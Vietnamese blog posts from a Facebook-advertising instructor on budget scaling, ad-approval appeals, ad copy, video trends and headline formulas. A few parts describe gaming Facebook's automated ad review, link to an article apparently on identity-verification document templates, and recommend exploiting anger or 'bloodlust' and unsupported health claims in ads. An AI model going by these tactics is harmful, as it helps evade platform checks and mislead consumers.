  Nó là chân lý cmnr anh chị em ạ, chậm là cứ ngồi mà kêu đắt, kêu lỗ rồi đổ cho thị trường vậy để tự an ủi tinh thần và run rủi nhau thôi á.

 • Đâu là các mốc ngân sách quảng cáo quan trọng với bạn?

  Đây là một phần quan trọng trong bài giảng của siêu lớp học MFA và chưởng môn nghĩ rằng hiểu rõ được vấn đề này với cá nhân mỗi nhà quảng cáo cũng quan trọng như sự sáng tạo, thậm chí quan trọng hơn mẫu quảng cáo nếu bạn đang chạy sản phẩm đơn giản dễ mua, dễ nhập hàng ồ ạt.

  100 người mới làm quảng cáo thì 90 người thường bị đứng lại ở mốc ngân sách 3-9triệu / ngày. Có phải mẫu quảng cáo của họ chưa đủ tốt, sản phẩm không đủ lợi nhuận hay vận hành còn hạn chế? Tất nhiên có, nhưng hai trường hợp ấy không nhiều.

  Một kịch bản ngân sách mà bất cứ người làm quảng cáo nào cũng từng một lần trải nghiệm qua là khi bạn lên vài camp test ngân sách 500 – 1 triệu / ngày thì lợi nhuận của bạn có thể x3 / ngân sách quảng cáo. Bạn nghĩ camp max ping đây rồi, và vụt ngay ngân sách 5 triệu / ngày hòng đẩy mạnh doanh số. Kết quả lợi nhuận của bạn ở camp 5 triệu = với ngân sách 2 triệu / ngày. Vậy nên chẳng lý do gì duy trì ngân sách 5 triệu, bạn tắt đi và nghĩ rằng ” thôi ăn từ từ vậy “

  Chưởng môn nghĩ rằng khoảng ngân sách quảng cáo từ 3 triệu đến 9 triệu là một khoảng ngân sách rủi ro. Đặc biệt với các bạn đang chạy sản phẩm có yếu tố cạnh tranh cao ( ví dụ đồ gia dụng nhập china )

  Muốn tìm được các mốc ngân sách phù hợp với ngành hàng của mình sao cho khôn ngoan nhất, các bạn cần hiểu rõ ba yếu tố sau:

  1/ Volume target hiệu quả của bạn chính xác là bao nhiêu?

  Yếu tố này sẽ quyết định bạn sẽ tiêu bao nhiêu tiền trong bao nhiêu ngày, sao cho phù hợp nhất với công suất vận hành của bạn. Cụ thể cách tính thì trong longhn.com mình cũng nói nhiều rồi.

  2/ Mức cạnh tranh sản phẩm của bạn đang ở mức nào?

  Chưởng môn chia các mức có yếu tố giảm dần như sau:

  ⁃ Nhập lại sản phẩm về bán ( rất cao )

  ⁃ Tự tìm nguồn nhập sản phẩm mới ( cao )

  ⁃ Nhập hàng từ sản xuất quy mô vừa nhỏ ( trung bình )

  ⁃ Tự sản xuất quy mô vừa nhỏ ( thấp )

  Do chỉ nói về các bạn mới tham gia cuộc chơi, vậy nên chưởng môn đã lược đi một vài trường hợp cỡ lớn và siêu lớn. Hiểu rõ mức cạnh tranh trong ngành hàng của bạn cũng sẽ giúp bạn quyết định khoảng cách giữa các mốc ngân sách sao cho phù hợp. Với các sản phẩm có mức cạnh tranh càng cao thì khoảng cách của các mốc tăng ngân sách càng rộng càng tốt.

  3/ Tần suất đáp ứng của khách hàng với sản phẩm của bạn là bao nhiêu?

  Tần suất đáp ứng nghĩa là khách hàng sẽ cần trung bình nhìn thấy bao nhiêu lần mẫu quảng cáo của bạn để xuất hiện hành vi mua hàng. Chưởng môn thường đánh giá yếu tố này cụ thể trên chỉ số hoặc áng chừng theo giá tiền ( chưa đủ chính xác ) sản phẩm giá thành càng cao thì tần suất đáp ứng đương nhiên tăng theo. Yếu tố này sẽ quyết định việc thốc ngân sách nhanh hay chậm, chia nhỏ tầng chiến dịch hay không? Có tạo phễu hay không? Và tất nhiên vì thế nó cũng ảnh hưởng rất lớn đến các mốc ngân sách quan trọng theo từng giai đoạn cụ thể.

  Ví dụ cụ thể cho các bạn dễ hiểu nhé,

  Giả thiết chưởng môn có một sản phẩm thời trang X, phân khúc thấp, nhập china sll từ chợ ninh hiệp. Tôi lên camp test ngân sách 1 triệu / ngày vào vài target thấy khá ổn, tổng dung lượng 3 triệu người, lợi nhuận x3 so với ngân sách quảng cáo test.

  Sau 2 ngày chạy test tôi thấy rằng với chỉ số trên camp nếu tiêu 10 triệu / ngày thì tôi sẽ mất 25 ngày để phủ hết tệp 3 triệu khách hàng. Tạm để đấy đã

  Đây là một sản phẩm có mức cạnh tranh rất cao, nếu thấy nó ngon thì ai cũng có thể trong 1 – 2 ngày là đối thủ của tôi. Vậy nên khoảng cách ngân sách giữa camp test và các mốc còn lại càng phải rộng càng tốt. Việc này tuỳ thuộc vào vận hành mà bạn có.

  Vì là sản phẩm phân khúc thấp, dễ mua nên tần suất đáp ứng mua hàng trong 2 ngày tôi chạy test là 1-1.1 đã có ctr 15% với CR > 50% và đây là một chỉ số rất tốt. Điều này nói lên chính xác rằng sản phẩm của tôi không cần yếu tố tần suất để có thể bán được hàng.

  Kết quả chưởng môn sẽ có 2 lựa chọn sau:

  1/ Chưa đủ vận hành hoặc tay chưa đủ to để ôm hàng thì tôi sẽ lựa chọn các mốc ngân sách 2 – 5 – 7 – 10 – 15 ( tăng ngân sách quảng cáo cũng như quay vòng vốn + lãi nhập hàng liên tục mỗi 3-4 ngày / 1 lần ). Và vì sản phẩm dễ để bán hàng nên tôi sẽ lựa chọn mục tiêu chiến dịch sao cho cùng ngân sách phủ đến nhiều khách hàng với chi phí có lợi nhất ví dụ tương tác hay lượt xem video mà ko quá ưu tiên mess hay landing.

  2/ Nếu vận hành + nguồn hàng đủ tôi sẽ có các mốc ngân sách 2 triệu ( test các mẫu quảng cáo ) – 20 triệu – 50 triệu / ngày – 100 triệu / ngày.

  Tôi loại bỏ các mốc nhỏ 3 – 5 – 7 để nhằm giảm đi yếu tố cạnh tranh, không ai dám đi vít cùng một thằng điên tiêu đang tiêu tiền quảng cáo.

  Và cũng đừng quên rằng, dù khi tỉ lệ lợi nhuận / 1 đơn hàng của bạn tụt giảm nhiều khi tăng ngân sách lớn thì các bạn vẫn còn có nhiều cơ hội cho remarketing hay look a like. Với một tỷ lệ chuyển đổi tốt thì đừng ngại ngần mà vung tiền, chung cuộc chiến thắng luôn ở bên bạn.

  Tóm lại, lựa chọn các mức ngân sách sao cho phù hợp và có lợi nhất là khâu tối quan trọng. Nó ảnh hưởng rất lớn kết quả mà sau bao ngày bạn cố gắng tìm ra sản phẩm ngon rồi có bị người khác ăn hộ không. Cần nhớ rằng cuộc chơi trong ngành quảng cáo online có một nguyên tắc truyền thuyết ” Ai nhanh thì được “. Các bạn không thể né tránh sợ người ta cướp mẫu quảng cáo, cướp sản phẩm của mình mà việc các bạn có thể làm là làm sao để người ta nhìn cũng chán luôn không muốn nhẩy đồ của bạn.

  Chúc các bạn chơi vui ?

 • Kỹ thuật: Để quảng cáo phê duyệt nhanh và 3 cách kháng không phê duyệt >24h không cần link.

  Để quảng cáo phê duyệt nhanh

  Bài quảng cáo mới lên thường bot sẽ duyệt lâu với các mục tiêu chiến dịch Mess hoặc Chuyển đổi, để khắc phục tình trạng này đặc biệt tài khoản quảng cáo mới chạy anh em lên một camp mục tiêu SỐ NGƯỜI TIẾP CẬN + có đặt lịch lùi phân phối lại 5 – 7 tiếng. Sau khi camp Số người tiếp cận cắn tiền thì mới lên camp mess vào đúng bài đó thì phê duyệt sẽ rất nhanh.

  3 Cách kháng phê duyệt quảng cáo khi review > 24h

  Để tăng độ thành công trong bất kỳ việc kháng nghị nào trên Facebook, các bạn nên tham khảo thêm bài
  https://longhn.com/ky-thuat-5-buoc-tao-moi-truong-xmdt-104-phoi-xmdt-facebook-update-moi-nhat-9898.html

  Thần chú: My ad account ID xxxx ( thay bằng ID TKQC ) is taking too long to approve, can you please help me to review it faster? Thanks for your support

  Chú ý: Gửi kèm ảnh chụp màn hình có camp đang review rõ ID tkqc

  Cách 1: Báo cáo vấn đề phê duyệt quảng cáo chậm trong Business Help

  https://www.facebook.com/business/help/support/get-help
  Tuy nhiên cách này yêu cầu via phải có lịch sử chạy quảng cáo tương đối thì mới hiện form support

  Chọn vào tài khoản quảng cáo

  Chọn dòng My Ad is pending in review

  Chọn vào nút contact support

  Điền thần chú, ảnh chụp màn hình và số điện thoại có thể liên lạc được.

  Sau khi ấn vào Start Chat, một lúc sau bot sẽ vào chat với bạn và hỗ trợ bạn phê duyệt quảng cáo.

  Cách 2: Báo cáo lỗi phê duyệt quảng cáo chậm trong Facebook help

  https://www.facebook.com/help
  Chụp ảnh màn hình camp đang review và làm theo hướng dẫn

  Chọn Help & support

  Chọn Report a problem

  Chọn Something went wrong

  Chọn và điền theo hình

  Cách 3: Dùng link 273 chuyên kháng tài khoản quảng cáo

  https://www.facebook.com/help/contact/2026068680760273

  Chọn theo hình

  Hết bài rồi, chúc anh em làm ads thủ nhanh đổi xe mua nhà nhé ka ka

 • NỘI DUNG QUẢNG CÁO

 • 7 nguyên tắc vàng để làm nội dung quảng cáo Facebook

  Đời này khổ nhất mấy anh giỏi toán mà bị bắt ngồi viết văn. Chưởng môn cũng từng có thời gian khổ sở với đống nội dung bán hàng. Có dạo mình nghĩ đi copy cho nhanh, nhưng nghĩ đi nghĩ lại đấy không phải cách lâu dài. Muốn ăn miếng to, vẫn là mình làm ra mới ĐI ĐẦU – VIT NHANH – WIN LỚN được.

  1/ Tiêu đề và ảnh số 1 cần thống nhất về mặt thông điệp:

  Đây là lỗi cực kỳ cơ bản của nhiều người làm quảng cáo hiện nay. Giật title một kiểu, ảnh thể hiện ko liên quan kiểu râu ông nọ cắm cằm bà kia. Các mẫu quảng cáo không thống nhất về thông điệp thường sẽ không đủ mạnh để khách hàng dừng lại và xem tiếp.

  2/ Chủ đề trong một mẫu quảng cáo chỉ chọn 1 thông điệp hoặc 1 chương trình khuyến mãi:

  Khách hàng càng ngày càng lười, nếu các bạn show một mẹt hàng đủ thứ long lanh lên thì thường họ sẽ chẳng chọn gì cả.

  3/ Hạn chế giảm giá, tặng quà nhiều hơn:

  Việc này sẽ giúp tăng giá trị / 1 đơn hàng mà nhà quảng cáo nhận được trong khi chi phí / 1 đơn vẫn như cũ.

  4/ Một bài quảng cáo thuần bán hàng tránh có quá nhiều sản phẩm:

  Tập trung vào 1 đến 5 mẫu bán chạy nhất sẽ giúp đẩy doanh số, giảm hàng tồn.

  5/ Đã là nội dung bán hàng, đừng bắt khách hàng phải nghĩ.

  Tất cả yếu tố: thông điệp, thông tin sản phẩm, giá bán, chương trình khuyến mãi, tôi là ai… Bla bla… cần đầy đủ và rõ ràng. Khách hàng xem mẫu quảng cáo chỉ YES or NO vậy thui. YES thì để lại số, NO thì next ?

  6/ Thông điệp cần phù hợp với target:

  Không một nhà quảng cáo nào có thể sáng tạo nội dung hài lòng tất cả mọi người được. Nếu có thì chỉ là nội dung vứt đi không có giá trị để bán hàng. Vậy nên cần tập trung thông điệp cho từng line target để tối ưu nhất.

  7/ Tập trung nội dung + hình ảnh vào giá trị khách hàng có thể nhận được, hoặc trải nghiệm của khách hàng chứ không phải việc cố gắng bán hàng:

  Đặt chúng ta vào vị trí khách hàng thì sẽ hiểu rằng chúng ta chỉ mua 2 thứ trong đời này. Thứ 1 CÓ ÍCH cho chúng ta, thứ 2 chúng ta CÓ LÃI. Làm gì có ai mua hàng vì thương chủ shop đói quá, hay đăng ký đi học Facebook chỉ để nhìn thấy thầy đẹp trai cho vui đâu, phải hem?

  Đấy là 7 nguyên tắc vàng cơ bản khi chúng ta tạo một nội dung bán hàng trên Facebook mà chưởng môn vẫn đang sử dụng & dạy học viên suốt 3 năm qua. Chúc các bạn áp dụng và thành công ? Khi nào giàu đừng quên đăng ký học MFA ủng hộ chưởng môn nhé ka ka ???

 • 3 bước làm nội dung quảng cáo Facebook ĐPH 8 9 10

  Làm nội dung quảng cáo có lẽ là thứ đau đầu nhất, hack não nhất đối với ace quảng cáo ???. Phải có hàng trăm bạn inbox cho chưởng môn hỏi về 1007 chuyện làm nội dung kiểu anh ơi em cố mãi ko đc điểm 8? Em chạy thời trang viết gì cho ngầu anh ơi? Anh ơi em bán mỹ phẩm thì nội dung sao cho hay ạ? Anh ơi em bán đông y chạy loại gì nội dung ntn? Anh ơi em làm spa thì nội dung cần chú ý gì ? …vân vân và mây mây.

  Hôm nay chưởng môn đã hệ thống và tóm lược lại trong 3 bước làm nội dung quảng cáo, sẽ giúp các bạn ngay lập tức có được những TƯ DUY ĐÚNG và nhanh chóng PHÁ ĐẢO CHỈ SỐ để đạt được điểm 8 9 10 các bạn nhé ?

  Ok shop, quẩy thôi nào ??

  BƯỚC 1: LỰA CHỌN TARGET TRƯỚC KHI LÀM NỘI DUNG

  99% các bạn làm quảng cáo được các thầy ngoài kia dạy nghĩ cứ phải tạo bài bán hàng ( nội dung ) rồi… mới chọn target. Sự thật là các bạn cần chọn target trước, rồi mới nghĩ đến chuyện VIẾT CÁI GÌ ĐÓ làm người ta có cảm xúc rồi muốn mua hàng của bạn. Bạn ko thể làm hài lòng tất cả, hãy tập trung vào 1 nhóm sinh ra lợi nhuận cho các bạn nhất.

  Đọc thêm: https://longhn.com/tu-duy-target-chuan-de-doi-xe-mua-nha-1284.html

  BƯỚC 2: CHIA LINE CẢM XÚC KHÁCH HÀNG ĐỂ KHAI THÁC

  Khi đã có target lúc này các bạn cần khai thác triệt để từng cảm xúc nổi bật trong tệp khách hàng ấy. Bạn có thể chọn 3 4 cảm xúc dưới đây, diễn giải nội dung theo 3 4 hướng khác nhau để test. Cái nào ngon lôi ra vit thôi ?

  Cảm xúc khách hàng cao cấp:

  Sự nghiệp, may rủi, phong thủy, gia đình, chữ hiếu, tình anh em, tình bạn bè, ăn gì ngon, chơi gì sướng, món quà, cuộc đời, đạo lý, nhân nghĩa, giá trị.

  ⁃ Cảm xúc khách hàng trung cấp:

  may rủi, phong thủy, tình yêu, phản bội, lập nghiệp, chữ hiếu, tặng quà, khuyến mãi, tín ngưỡng.

  ⁃ Cảm xúc khách hàng thấp cấp:

  may rủi, giận dữ, khinh miệt, phản bội, chữ hiếu, bất hiếu, giá rẻ, khuyến mãi, cảm thấy có lợi, cảm thấy lãi, tặng quà, khát máu, đánh giết, tín ngưỡng.

  Đọc thêm:https://longhn.com/ky-thuat-3-buoc-mix-target-content-quang-cao-facebook-de-20d-10k-1-binh-luan-1110.html

  BƯỚC 3: TẬP TRUNG VÀO 2 ĐIỂM QUAN TRỌNG NHẤT CỦA NỘI DUNG

  Sau khi xác định được target là ai? Các loại cảm xúc họ có thể sẽ tương tác mạnh nhất là gì? Thì chúng ta có thể làm nội dung cho bài quảng cáo và “TITLE + HÌNH ẢNH SỐ 1” là 2 yếu tố chúng ta phải bận tâm hàng đầu. Lý do là vì 2 yếu tố ấy quyết định việc khách hàng có thấy cuốn hút hay không? sẽ có cảm xúc như thế nào? với mẫu quảng cáo của bạn. Title và hình ảnh số 1 phải có cùng ngôn ngữ + thông điệp thống nhất, tránh chỉ giật title hay ảnh số 1 chỉ là ảnh sản phẩm không có thông điệp hay cảm xúc gì. Hãy nhớ rằng chỉ cần khách hàng họ #DỪNG_LẠI & xúc động, yêu thương hay giận dữ khi lướt new feed là bạn đã chiến thắng trong cuộc chiến nội dung rồi.

 • Xu hướng nào cho nội dung quảng cáo online

  2020 đi qua với ảnh hưởng to lớn của covid chúng ta đã thấy một năm ảm đạm của kinh tế và cũng chứng kiến sự bùng nổ nhu cầu thất thường ở một số ngành hàng tiêu dùng.

  Trong năm 2020 những xu hướng làm nội dung quảng cáo cầu kỳ hay chuyên nghiệp đã dần mai một thấy rõ, các big trend ” tâm sự chia sẻ “, ” Real & fake news “, KOL, bán hàng bằng landing page đã lên ngôi mạnh mẽ trong 2019 cũng bị suy giảm mạnh. Có thể nói biến cố covid đã đốt cháy hành vi & cảm xúc tiêu dùng của thị trường online sang một nấc tiến hoá nhanh hơn thông thường.

  Chưởng môn nghĩ rằng có 3 lý do chính cho điều này:

  1/ Hệ thống quảng cáo của Facebook thông minh dần lên,

  Phân loại và hạn chế kỹ càng hơn các ngữ cảnh quá phù phép nhằm kêu gọi tương tác của người dùng.

  2/ Chạy quảng cáo livestream lên ngôi

  Tác động không nhỏ đến thị hiếu tiếp nhận nội dung của người dùng.

  3/ Người dùng ngày càng bị thất vọng với sản phẩm thực tế sau khi nhận hàng,

  Tất nhiên họ sẽ đổ lỗi cho shop làm quảng cáo quá đẹp, quá lộng lẫy nói quá công dụng để lừa họ. Họ muốn thấy gì đó thực tế hơn, đặc biệt các tầng sản phẩm giá trị thấp, và livestream seller là cách mà họ đã chọn.

  Vậy điều gì sẽ xảy ra trong tâm trí khách hàng của năm 2021-2022?

  Quên những clip dàn dựng hay kịch bản công phu đi, những bộ ảnh quảng cáo bóng bẩy sẽ trở thành kệch cỡm và không đáng tin trong mắt khách hàng. Đừng bao giờ để khách hàng phải phân vân giữa việc ảnh của shop và sản phẩm nhận được nữa.

  Chưởng môn cho rằng xu thế “Thực hành” hay có thể gọi “cùng trải nghiệm cảm xúc” sẽ là xu hướng số 1 trong năm 2021-2022.

  Khái niệm này không mới, nhưng sẽ có rất nhiều nhà quảng cáo bị nhầm giữa “unbox” và “practice” vì nó na ná nhau. Nhưng ví dụ một clip mở hộp iphone với những lời có cánh và một clip có 5 ông khui hộp bật iphone chơi test 2 game hot nhất thị trường rồi đưa ra cảm nhận. Clip nào sẽ thúc đẩy sale hơn?

  Chưởng môn nghĩ rằng những nhà làm quảng cáo đủ tinh tế sẽ đồng ý với tôi rằng: Làm mới một cái xe thì dễ, để nó có dấu vết của thời gian thì khó, để nó mang trong mình một câu chuyện là đỉnh nhất. Vậy nên việc cân bằng cái gọi là giá trị quảng cáo và thực tế sao cho đúng mức là việc của những nhà làm quảng cáo chuyên nghiệp luôn phải tư duy và đương nhiên nó cũng là thứ khách hàng mong muốn nhất.

 • Xu hướng làm video quảng cáo hiện đại

  Thời lượng 1 video quảng cáo?

  2017 khi giảng dạy những lớp MFA đầu tiên, Chưởng Môn đã luôn nói rằng các video bán hàng dần dần sẽ càng ngắn hơn và có thời lượng DƯỚI 1 PHÚT. Và khi tôi dạy các học trò mình làm các video dưới 1p30s thì hầu hết đều nói 1 câu: ” Ngắn quá em nói được 1 tí đã hết ” =))

  2022
  Thời lượng 30s – 45s đang dần xác lập là chuẩn mực của video quảng cáo hiện đại.

  Nội dung video quảng cáo đang dịch chuyển từ việc product show ( giới thiệu sản phẩm ) trở về trước – 2017

  => Storytelling ( Kể chuyện ) 2018 – 2021

  => Và của hiện tại đang là Hidden Message ( Thông điệp ẩn ) 2022Ví dụ video quảng cáo của chivas với idol lisa + messenge ” hoà đam mê – ghi dấu ấn “

  Chúng ta thấy rằng xung hướng nội dung video quảng cáo đang dần tiến đến những giá trị bên ngoài của sản phẩm, tập trung vào khách hàng nhiều hơn.

  Tập trung vào 1 cảm xúc của một nhóm đối tượng khách hàng cụ thể và khai thác nó tối đa thay vì đưa những giá trị vượt trội của sản phẩm lên trước.

  Dù việc đó tạm làm giảm hiệu quả quảng cáo ( giảm chuyển đổi ngắn hạn ) nhưng xét yếu tố lâu dài và đủ tần suất. Thì lại tạo ra vùng khách hàng ” An toàn ” của brand trong mỗi ads network mà nhà quảng cáo đang tham gia.

  Điều này đặc biệt đúng khi yếu tố riêng tư của người dùng đang được bảo vệ bởi chính các nhà sản xuất smart phone, nó vô hiệu hoá các AI thông minh nhất của các hệ thống ads network do không còn thu thập được lượng data đầu vào dồi dào như trước.

  Xu hướng video quảng cáo cho những short video tiếp theo sẽ là gì?

  Ồ áp lực của việc duy trì một short video ( tiết kiệm ngân sách hơn khi phủ quảng cáo nhằm truyền tải thông điệp ). Vẫn phải giữ chân được người dùng xem trong 1 khoảng thời gian nào đó 30%-50% video mới có chuyển đổi. Trong khi thị hiếu của người dùng là thứ cả thèm chóng chán, họ tò mò thông điệp của bạn 1 lần 2 lần chứ đến 4 5 thì họ say no.

  Chưởng môn nghĩ rằng trong khoảng 2-3 năm tới, các dạng video Share emotion ( chung cảm xúc ) hoặc cao hơn Emotiontelling ( Biểu tượng cảm xúc ) sẽ là xu hướng làm video quảng cáo mới, và nếu người ta tập trung vào biểu tượng.

  Có lẽ, thời lượng quảng cáo chỉ còn 5 – 10s là đủ. Ka ka, nghĩ thôi đã thấy cạnh tranh visual nó sẽ lên đến mức tầm cao như thế nào.

 • 3 công thức và 29 yếu tố để viết tiêu đề quảng cáo

  Chào các bạn, để viết 1 bài quảng cáo hay không hề khó. Khi các bạn google các keywords “cách viết quảng cáo hay” thì đầy các mẫu có sẵn cho bạn chọn. Vấn đề là khách hàng… Có đọc hết nội dung của bạn để họ thấy hay ho không đã, phải không ?

  Điểm mấu chốt là trong 3s đầu tiên, khách hàng cần 1 biển chỉ đường để định hình cảm xúc, từ đó đưa ra quyết định có hay không tiếp tục xem hoặc tương tác với quảng cáo của bạn như thế nào. Tấm biển đó chính là title và tagline

  Trong bài viết này, tôi sẽ chỉ tập trung vào phân tích cấu trúc TITLE VÀ TAGLINE từ đó đưa ra công thức dễ ứng dụng nhất. Giúp các bạn chỉ trong 15p có thể sản xuất title&tagline điều hướng cảm xúc của khách hàng theo ý mình muốn.

  Trước khi phân tích, bởi vì các bạn hay nhầm title với tagline và ngược lại. Nên tôi sẽ định nghĩa lại 1 chút như sau:

  Title: Tiêu đề, là tấm bảng chỉ dẫn cảm xúc đầu tiên cho bất kì nội dung quảng cáo nào. Vị trí đương nhiên là đầu tiên.

  Tagline: là tấm bảng làm rõ, gắn liền, định vị của sản phẩm hoặc chốt lại cảm xúc của khách hàng. Tóm lại nó càng ngắn càng tốt và có thể nằm dưới title hoặc nằm ở bất cứ đâu trong bài quảng cáo. ( khác hẳn với slogan để định vị chiến lược của cả công ty nhé )

  Ok bây giờ chúng ta bắt tay vào cụ thể nào:

  Công thức số 1: Độ dài 25 đến 60 ký tự, đây là 1 độ dài trung bình 1 người dùng mất 3s để có thể đọc hết mà không làm người dùng cảm thấy mệt.

  Các bạn có thể download app tính độ dài khi viết 1 tiêu đề bên dưới:

  Word Count – With Today Widget and Action Extension của Sadah Software Solutions, LLC

  https://itunes.apple.com/vn/app/word-count-with-today-widget-and-action-extension/id997814012?l=vi&mt=8

  Công thức số 2: 8 từ đầu tiên, luôn là những keywords hot nhất. Keywords này sẽ là 1 kim chỉ nan cho nội dung bài quảng cáo của các bạn, có thể coi nó là ý tưởng, xương sống. Vậy nên trong 8 từ đầu tiên này, bạn hãy TẬP TRUNG để biểu diễn 1 thứ cảm xúc thật cụ thể nhất mà bạn có thể tưởng tượng ra. Đừng tham lam

  Ví dụ: DẠO PHỐ ĐẸP NHƯ PHẠM BĂNG BĂNG VÀ KIẾNG MẮT FREESTYLE

  ( Ở ĐÂY ĐẸP NHƯ PHẠM BĂNG BĂNG LÀ KEYS, CHỊ EM AI CHẢ ƯỚC ĐẸP NHƯ IDOL? FREESTYLE LÀ TÊN THƯƠNG HIỆU)

  Công thức số 3: Tagline luôn cần có và nhắc lại trong bất cứ bài nào, để người dùng nhớ được đặc tính sản phẩm của bạn. Dễ lắm, bạn chỉ cần buông 1 câu ngẫu hứng, thậm chí chả liên quan mẹ gì đến title hay nội dung quảng cáo hi hi (tất nhiên nên nói về 1 đặc tính nổi bật của sản phẩm ). Ví dụ: tôi luôn cho thêm câu Chấp All thầy vào mỗi bài viết của mình =)))

  Tóm lại thì một title ổn và hay theo định nghĩa của chưởng môn là bao gồm được 3 thành tố:

  Gây cảm xúc mạnh mẽ( sợ, yêu, tò mò, tham..) + công dụng sp + thương hiệu

  ??? Đến giờ thực hành rồi:

  Đây là 29 yếu tố viết tiêu đề chắc chắn sẽ giúp bạn sáng tạo hơn nữa hoặc cải thiện những tiêu đề bình thường.

  1.Giật title theo trend

  Mạnh như găng tay vô cực cũng thua máy tính của laptop88

  Phía trước là bầu trời, phía sau là biển – Sắm đồ bơi thôi

  Vạch trần lý do Hà Hồ nói Cường đôla yếu khi yêu

  2. Giới hạn đối tượng khách hàng

  Thợ sửa ống nước!

  Các bà nội trợ!

  Chân bị đau?

  Loại tiêu đề này sẽ giúp mời gọi đối tượng khách hàng bạn nhắm đến. Nếu đang bán một cuốn sách dành cho luật sư, bạn có thể mở đầu bằng câu “Hãy chú ý, hỡi các luật sư!” Bằng cách này, thông điệp của bạn sẽ được tiếp nhận bởi những khách hàng bạn cần.

  3. Hứa hẹn một lợi ích

  Bạn sẽ hết đau lưng trong vòng 10 phút!

  Mua một tặng một!

  Phương pháp mới để kiếm được việc làm chỉ trong 2 ngày!

  Lọi ích chính là lý do để mọi người mua hàng. Chẳng hạn như với sản phẩm là cà phê không chứa chất caffeine, việc không chứa caffeine chỉ là đặc tính của sản phẩm; lợi ích chính của sản phẩm này chính là giúp bạn dễ ngủ hơn. Khi một người bị đau lưng, điều họ cần không phải là những viên thuốc mà làm thế nào để hết đau. “Bạn sẽ hết đau lưng trong vòng 10 phút!” cho người đọc biết rằng có một cách trị đau lưng hiệu quả. Chúng ta bán sự giảm đau chứ không bán cách phòng ngừa. Khi bạn nói lên được điều mà khách hàng muốn hoặc cần, bạn sẽ lôi kéo được họ ngay lập tức.

  4. Viết tiêu đề dưới dạng tin sốt dẻo

  Giải pháp đột phá để chống trộm ô tô

  Công thức mới giúp hồi sinh mái tóc

  Bảy “Bí mật thất truyền” đã được khám phá

  Tin tức là món ăn tinh thần không thể thiếu của quần chúng. Hãy truyền tải sản phẩm dịch vụ của bạn như những tin sốt dẻo và bạn sẽ gây được chú ý. Việc ra một sản phẩm mới chính là tin sốt dẻo. Một sản phẩm cũ có công dụng mới cũng là tin sốt dẻo. Khởi đầu là một cửa hàng nhỏ lẽ khiêm tốn, công ty hóa dược phẩm Arm Hammer đã phát triển mạnh trong nhiều thập kỷ. Họ không ngừng nghĩ ra những cách thức mới để công chúng sử dụng các sản phẩm của họ – từ việc sử dụng thuốc muối để đánh răng cho đến việc dùng nó để khử mùi – và chỉ một sản phẩm với công dụng khác nhau luôn tạo thành những tin sốt dẻo.

  5. Một món đồ miễn phí

  Các nhà văn sẽ được miễn phí!

  Miễn phí báo cáo thuế!

  Cẩm nang hướng dẫn sửa ô tô miễn phí!

  Món đồ miễn phí của bạn phải phù hợp với nhu cầu của đối tượng khách hàng mà bạn nhắm đến. Cũng cần nhớ rằng, món hàng đó phải thực sự miễn phí – tức là không kèm theo bất kỳ điều kiện hay sự chèo kéo nào. Bất kỳ doanh nghiệp nào cũng có thể làm một món hàng miễn phí vừa đáp ứng nhu cầu khách hàng vừa có tác dụng phuc vụ việc quảng bá.

  6. Đặt câu hỏi gây tò mò

  Đâu là 7 bí quyết của thành công?

  Bạn có hay mắc phải những lỗi sai này trong tiếng Anh?

  Bọ lọc máy nào có thể giúp ô tô của bạn chạy tốt hơn?

  Câu hỏi là một phương tiện quyền năng để mời gọi sự tương tác của người đọc. Nhưng câu hỏi phải có tính gợi mở và hứa hẹn một lợi ích nào đó cho độc giả. Nếu bạn đặt một câu hỏi có thể dễ dàng trả lời hoặc không, e là độc giả sẽ nhanh chóng phớt lờ câu hỏi đó. Nhưng nếu câu hỏi của bạn có vẻ hấp dẫn, nó sẽ lôi kéo người đọc vào mẩu quảng cáo để họ tìm thấy câu trả lời. Đây là một phương pháp tôi ưa thích để khiến cho độc giả bị hút vào bài viết của mình.

  7. Mở đầu bằng một chứng thực

  “Đây là thứ vũ khí mạnh nhất tôi từng được biết”

  “Hai quyển sách này đã giúp tôi trở thành một trong những người giàu có nhất thế giới”

  “Đây chính là lý do vì sao những chiếc xe đua của tôi luôn đánh bại những đối thủ khác”

  Những dấu ngoặc kép luôn có sức hút kỳ lạ với người đọc. Nếu câu trích dẫn trong đó có nội dung hấp dẫn như những câu trên, độc giả sẽ không thể không đọc được. Bạn có thể yêu cầu sự chứng thực từ bất kỳ ai đã từng sử dụng sản phẩm hoặc dịch vụ của bạn. Và những tiêu đề đặt trong ngoặc kép thường hiệu quả hơn – vì những lời thoại luôn gắn liền với cuộc sống của mọi người nên thường gây chú ý tốt hơn.

  8. Tiêu đề “Làm thế nào”

  Làm thế nào để con cái nghe lời bạn

  Làm thế nào để biết xe máy của bạn đang cần được bảo dưỡng

  Làm thế nào để có thêm bạn bè và tạo sức ảnh hưởng đến công chúng

  Con người luôn khát khao thông tin, nên họ dễ dàng bị thu hút bởi những tiêu đề “Làm thế nào” có thể giúp họ giải quyết vấn đề hoặc nhu cầu nó đó của mình. Nếu bạn đang quảng cáo máy giặt, bạn có thể viết “Làm thế nào để chọn được một chiếc máy giặt phù hợp”. Bạn có thể làm cho mọi tiêu đề trở nên hấp dẫn chỉ bằng cách thêm vào hai chứ “thế nào”. Ví dụ, “Tôi cắt tóc đẹp” là một tiêu đề rất yếu ớt, nhưng “Tôi cắt tóc đẹp như thế nào” lại nghe rất thu hút.

  9. Dùng câu hỏi trắc nghiệm

  Bạn thông minh đến mức độ nào? Hãy trả lời bảng câu hỏi sau để biết.

  IQ trong Networking của bạn bằng bao nhiêu?

  Bạn có đủ những tố chất để thành công?

  Mọi người ai cũng thích những câu hỏi trắc nghiệm. Đặt ra một câu hỏi trong tiêu đề dưới dạng một câu hỏi trắc nghiệm. Hiển nhiên, mẩu quảng cáo chỉ phát huy hiệu quả khi các câu hỏi có liên quan đến những gì bạn bán. Nếu bạn đang quảng cáo cho cửa hiệu sửa xe ô tô, bạn có thể hỏi: “Ô tô của bạn có đang thực sự chạy tốt? Hãy trả lời những câu hỏi sau để biết!” Tất cả những nỗ lực này chỉ nhằm một mục đích là khiến cho độc giả tương tác với bạn. Bảng câu hỏi trắc nghiệm là một cách để đạt được mục đích này.

  10. Dùng từ “này’ và ‘vì sao” trong tiêu đề

  Những chiếc thuyền này không bao giờ chìm

  Vì sao những con chó của chúng tôi đắt hơn?

  Vì sao những ván trượt tuyết này được đánh giá là “hoàn hảo”?

